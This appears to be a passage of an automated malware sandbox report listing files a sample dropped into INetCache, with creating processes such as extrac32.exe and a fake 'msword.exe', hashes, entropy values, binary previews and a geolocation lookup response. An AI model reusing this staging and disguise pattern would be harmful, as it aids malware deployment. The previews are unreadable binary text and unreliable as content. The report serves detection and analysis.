                                                                                      SSDEEP:3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
                                                                                      MD5:99A9AA7C4197C9FA2B465011F162397E
                                                                                      SHA1:F4501935D473209F9D6312E03E71B65271D709E4
                                                                                      SHA-256:6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
                                                                                      SHA-512:03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
                                                                                      Malicious:false
                                                                                      Preview:4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7.*..%...".&].2....@......Q...YZ.d.P...r\.;...*e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d.*.?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....*>...i.y.b.....5.G*[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da*.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Brian

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):97280
                                                                                      Entropy (8bit):5.234350627932401
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
                                                                                      MD5:031B6C0EDF7E1DD8ACF9700CC96085D7
                                                                                      SHA1:0819EC14EBC323A9507E52A0579F6F9BA1589C3D
                                                                                      SHA-256:7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
                                                                                      SHA-512:75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
                                                                                      Malicious:false
                                                                                      Preview:?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Clinton

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):4.910075425726921
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
                                                                                      MD5:2BC25537976C2E146EBED51446CE7B59
                                                                                      SHA1:0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
                                                                                      SHA-256:F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
                                                                                      SHA-512:7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
                                                                                      Malicious:false
                                                                                      Preview:................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):72704
                                                                                      Entropy (8bit):7.997164994069138
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
                                                                                      MD5:990ABD973C6DDB75837EEB5B21F59AE1
                                                                                      SHA1:85846C0CE7CD3314DEC32E3BED99511A59B6500A
                                                                                      SHA-256:29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
                                                                                      SHA-512:179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
                                                                                      Malicious:false
                                                                                      Preview:.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...y*w..1...V.~........h\pK3m ........(h..|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[|.."}...E...../.$.......d.|..X.-^.d.F"..".W..(..<.........HQ............M!c......?*Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Constitute

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):144384
                                                                                      Entropy (8bit):6.494296209067955
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
                                                                                      MD5:57BB8B206C43DDE57D7066A4DEDB272C
                                                                                      SHA1:E3B400206A6D3C7C5885CB56BFCAB82220BB110A
                                                                                      SHA-256:821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
                                                                                      SHA-512:C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
                                                                                      Malicious:false
                                                                                      Preview:..F...................E....;E...MN..;...EN.........H......T...$.P*A........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.x*A....c.......Z...;...|....N......u........P..................S.......*A..$..*A......V.......1....7........u...S...l....q...........h....$..*A....N...V...]....M...H..........$..*A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\David

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):56320
                                                                                      Entropy (8bit):7.996610067500435
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
                                                                                      MD5:583A66DF71B30CE556F3F5131162AA1C
                                                                                      SHA1:0594EF5DF9510410B520282D9C833D604969865A
                                                                                      SHA-256:83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
                                                                                      SHA-512:3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
                                                                                      Malicious:false
                                                                                      Preview:J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T*.&.c..G. .....q.B..Sf..........M....m.A|..S.N.:....?0R*....$*:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a*.\..R.-.w....b.1..g..yJL...)...A*J.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......*J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Different

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):70656
                                                                                      Entropy (8bit):6.548010857173451
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
                                                                                      MD5:56BB83409EE3E1A9DDF64E5364CBAAF6
                                                                                      SHA1:C3DA7B105A8C389BE6381804CB96BB0461476E39
                                                                                      SHA-256:D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
                                                                                      SHA-512:59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
                                                                                      Malicious:false
                                                                                      Preview:U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dressing

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):137216
                                                                                      Entropy (8bit):6.481339286025911
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
                                                                                      MD5:1CB233987779B587705687B7D8F66A01
                                                                                      SHA1:5F33D543C24701D370072BB4E77E4A8D058AE035
                                                                                      SHA-256:48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
                                                                                      SHA-512:56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
                                                                                      Malicious:false
                                                                                      Preview:.j.....I......u0..$.I....Q..|....L..t..I8.A..|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..|:...L:.t..I8.A..|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..|1...D1.t..@8.H...|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..|1...T1.t..R8.B..|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..|....T..t..R8.B..|....D..t..@8.@.....>_^3.[]...U

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):963
                                                                                      Entropy (8bit):5.019205124979377
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                      SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                      SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                      SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                      Malicious:false
                                                                                      Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indonesia

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):74752
                                                                                      Entropy (8bit):6.557400918137722
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
                                                                                      MD5:15BE985957A02EE4B7D96A3C52FF0016
                                                                                      SHA1:B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
                                                                                      SHA-256:E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
                                                                                      SHA-512:9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
                                                                                      Malicious:false
                                                                                      Preview:.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Instantly

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):90112
                                                                                      Entropy (8bit):6.7085176792029815
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
                                                                                      MD5:7FC8AB46CD562FFA0E11F3A308E63FA7
                                                                                      SHA1:DD205EA501D6E04EF3217E2D6488DDB6D25F4738
                                                                                      SHA-256:5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
                                                                                      SHA-512:25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
                                                                                      Malicious:false
                                                                                      Preview:.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Led

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):147456
                                                                                      Entropy (8bit):6.70232349488191
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
                                                                                      MD5:C038EEFE422386831ACF8D9D6898D464
                                                                                      SHA1:9CF7F3E9A50218D5E03617B793EAE447645E6A90
                                                                                      SHA-256:1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
                                                                                      SHA-512:8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
                                                                                      Malicious:false
                                                                                      Preview:J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leisure

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:OpenPGP Secret Key
                                                                                      Category:dropped
                                                                                      Size (bytes):61440
                                                                                      Entropy (8bit):7.997097243867807
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
                                                                                      MD5:838511D6727BE6237C1E4CD26A0885DE
                                                                                      SHA1:7A9FFA35532A5817F04CB48C9E154B5C9DE74623
                                                                                      SHA-256:D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
                                                                                      SHA-512:AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
                                                                                      Malicious:false
                                                                                      Preview:.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL.*.s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.*pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.....*....Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e.*..>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Math

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):76800
                                                                                      Entropy (8bit):7.997538946660952
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
                                                                                      MD5:7B5C9E82025D184E64A7413174CE1A1C
                                                                                      SHA1:C552965CE73D43225541932D65C3B4B6342A70E4
                                                                                      SHA-256:7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
                                                                                      SHA-512:71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
                                                                                      Malicious:false
                                                                                      Preview:/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>..*..a.d..}.N*.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Measurement

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1237
                                                                                      Entropy (8bit):3.752009061763574
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
                                                                                      MD5:47FE88841F7CEA67286B6BB812A7A09F
                                                                                      SHA1:950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
                                                                                      SHA-256:33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
